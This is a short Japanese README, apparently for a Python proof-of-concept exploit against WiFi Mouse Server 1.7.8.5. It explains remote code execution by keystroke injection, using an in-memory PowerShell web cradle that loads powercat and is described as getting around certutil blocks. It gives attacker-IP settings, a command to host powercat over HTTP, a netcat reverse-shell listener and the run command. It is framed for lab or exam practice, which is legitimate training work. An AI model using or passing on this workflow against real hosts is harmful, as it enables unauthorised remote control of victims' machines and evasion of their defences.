
WiFi Mouse Server v1.7.8.5 向けに最適化された Python 3 の概念実証(PoC)エクスプロイトです。このスクリプトは、プロトコル固有の脆弱性を利用し、自動化されたキーストローク注入によってリモートコード実行(RCE)を実現します。
このバージョンは、ホストの堅牢化制約(certutil.exe の実行制限やバイナリのダウンロードブロックなど)により従来の公開エクスプロイトが失敗するラボ環境向けに、明示的に修正・調整されています。
cmd.exe と certutil.exe に依存して、悪意のある実行ファイルをディスクに配置します。堅牢化された、または現代の試験・ラボ環境では、これらの LOLBins はローカルグループポリシーによって制限またはブロックされることがよくあります。この修正版では、powercat.ps1 を使用した PowerShell Web クレードルを介して、攻撃ベクトルを完全にメモリ上へ移行します。スクリプトを開き、ファイル先頭の設定変数をローカル環境の設定に合わせて更新してください:
rhost = sys.argv[1]
lhost = "192.168.45.167" # Your Attacker/Kali IP
lport = "443" # Your Netcat Listener Port
http_port = "80" # Your local HTTP Server Port hosting powercat
ローカルの攻撃機のディレクトリ内で powercat.ps1 をホストしてください:
python3 -m http.server 80
別のターミナルタブで、設定した lport へのリバースシェルリスナーを起動してください:
nc -lvnp 443
ターゲットマシンの IP アドレスに対してスクリプトを実行してください:
python3 exploit.py <TARGET-IP>